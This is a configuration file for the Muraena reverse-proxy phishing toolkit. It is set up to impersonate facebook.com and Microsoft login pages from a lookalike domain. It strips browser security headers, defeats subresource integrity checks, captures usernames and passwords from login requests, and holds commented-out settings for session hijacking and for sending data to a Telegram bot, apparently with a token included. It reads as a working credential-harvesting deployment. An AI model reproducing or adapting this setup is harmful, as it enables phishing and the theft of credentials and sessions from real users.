#
# Proxy
# The proxy configuration controls how Muraena handles traffic routing between the phishing target and the
# legitimate destination.
# See: https://muraena.phishing.click/docs/proxy
#
[proxy]
    # Phishing domain
    phishing = "gmeoo.site"

    # Target domain to proxy
    destination = "facebook.com"

    # Listen on all interfaces
    IP = "0.0.0.0"

    # Use 443 for HTTPS
    port = 443

    # Use TCP4 for listener
    listener = "tcp4"

    #
    # Simple port forwarding used when the phishing site listen on a port different from target domain, such as:
    # - test.muraena:8443
    # - victim.site: 443
    #
    # port mapping can be configured as follows:
    # <ListeningPort>:<TargetPort>
    # portmapping = "1337:443"

    # Force HTTP to HTTPS redirection
    [proxy.HTTPtoHTTPS]
    enable = true
    port = 80


#
# Origins
# See: https://muraena.phishing.click/docs/origins
#
[origins]
externalOriginPrefix = "ext-"
externalOrigins = ["github.com", "login.microsoft.com","account.live.com", "login.live.com", "microsoft.com", "office.com", "outlook.com", "windows.net", "windows.com", "microsoftonline.com", "microsoftonline-p.com"]

#
# Transform
# Proxy's replacement rules
# See: https://muraena.phishing.click/docs/transform
#
[transform]
    # Enable transformation rules in base64 strings
    [transform.base64]
        enable = false
        padding = [ "=", "." ]

    [transform.request]
#        userAgent = "MuraenaProxy"
#        headers = ["Cookie", "Referer", "Origin", "X-Forwarded-For"]
#        remove.headers = [
#            "X-FORWARDED-FOR",
#            "X-FORWARDED-PROTO",
#        ]
#        add.headers = [
#            {name = "X-Phishing", value = "via Muraena"},
#        ]

    [transform.response]
        skipContentType = ["image/jpeg", "font/*", "application/*"]

       headers = [
                "Location",
                "Origin",
                "Set-Cookie",
                "Access-Control-Allow-Origin",
                ]
       customContent = [
                ["integrity=", "integrify="]
                ]
#
       remove.headers = [
                "Content-Security-Policy",
                "Content-Security-Policy-Report-Only",
                "Report-To",
                "X-Content-Type-Options",
                "X-Frame-Options",
                "Referrer-Policy",
                "Strict-Transport-Security",
                "X-XSS-Protection",
                    ]
       add.headers = [
           {name = "X-Phishing", value = "via Muraena"},
                    ]


#
# Redirect
# See: https://muraena.phishing.click/docs/redirect
#
    [[redirect]]
        hostname = "phishing.click"
       path = "/buyer/reset"
       redirectTo = "https://phishing.click/evilpath/static"
       httpStatusCode = 301


#
# LOG
# See: https://muraena.phishing.click/docs/log
#
[log]
    enable =true
    # Default: "muraena.log"
#    filePath = "muraena.log"


#
# Redis
# See: https://muraena.phishing.click/docs/redis
#
#[redis]
#	host = "" # default: "127.0.0."
#	port =  # default: 6379
#	password = "" # default: ""

#
# TLS
# See: https://muraena.phishing.click/docs/tls
#
[tls]
    enable = true
    expand = false
    certificate = "/etc/letsencrypt/live/gmeoo.site/fullchain.pem"
    key = "/etc/letsencrypt/live/gmeoo.site/privkey.pem"
    root = "/etc/letsencrypt/live/gmeoo.site/chain.pem"
    minVersion = "TLS1.2"
    insecureSkipVerify = true
    sessionTicketsDisabled = true
    renegotiationSupport = "Never"

	#
	# Danger zone, be careful editing these settings
	#
	# Minimum supported TLS version: SSL3.0, TLS1.0, TLS1.1, TLS1.2, TLS1.3
#    maxVersion = "TLS1.3"
#	preferServerCipherSuites = true



#############################################################################
# Modules
#############################################################################

#
# Tracking
# See: https://muraena.phishing.click/modules/tracker
#
[tracking]
    enable =true
    trackRequestCookie = true

    [tracking.trace]
        # Tracking identifier
        identifier = "_gat"
        # Rule to generate and validate a tracking identifier
        validator = "[a-zA-Z0-9]{5}"
        # Tracking initial HTTP Header (empty is: If-Range)
        header = "X-Whatveryouwant-Header"
        # Set tracking cookie for a custom domain
        # domain = ""

        [tracking.trace.landing]
            # Tracking types can be Path || Query (default)
            #
            # query:
            #  ?identifier=trackingID
            #
            # path:
            #   /trackingID
            #
            type = "query"
            # Landing HTTP Header (empty is: X-If-Landing-Redirect)
            header = "X-Whatveryouwant-Landing-Header"

            # redirect url once the landing is detected (applicable only if type is path)
            # redirectTo = "https://www.google.com"

[tracking.secrets]
        paths = ["/login", "/submit", "/user/ajaxsignin", "/ppsecure/post.srf"]

        [[tracking.secrets.patterns]]
        label = "Credential Capture - Username"
        start = "login="
        end = "&"

        [[tracking.secrets.patterns]]
        label = "Credential Capture - Password"
        start = "passwd="
        end = ""



#
# NecroBrowser
# See: https://muraena.phishing.click/modules/necrobrowser
#
#[necrobrowser]
#    enable = true
#    endpoint = "http://10.0.0.2:3000/instrument"
#    profile = "./config/instrument.necro"

#    [necrobrowser.urls]
#    authSession = ["/settings/profile"]
#    authSessionResponse = ["/privacypolicy"]
#
#    [necrobrowser.trigger]
#    type = "cookie"
#    values = ["ESAUTHENTICATED"]
#    delay = 5


#
# Static Server
# See: https://muraena.phishing.click/modules/staticserver
#
[staticServer]
   enable = true
   localPath = "./static/"
   urlPath = "/evilpath/static"

#
# Watchdog
# See: https://muraena.phishing.click/modules/watchdog
#[watchdog]
#	enable =true
#	dynamic = true
#	rules = "./config/watchdog.rules"
#	geoDB = "./config/geoDB.mmdb"

#
# Telegram
# See: https://muraena.phishing.click/modules/telegram
#[telegram]
#    enable =true
#    botToken = "1587304999:AAG4cH8VzJ1b8tbamq0VZM9C01KkDjY5IFo"
#    chatIDs = ["-1001856562703"]
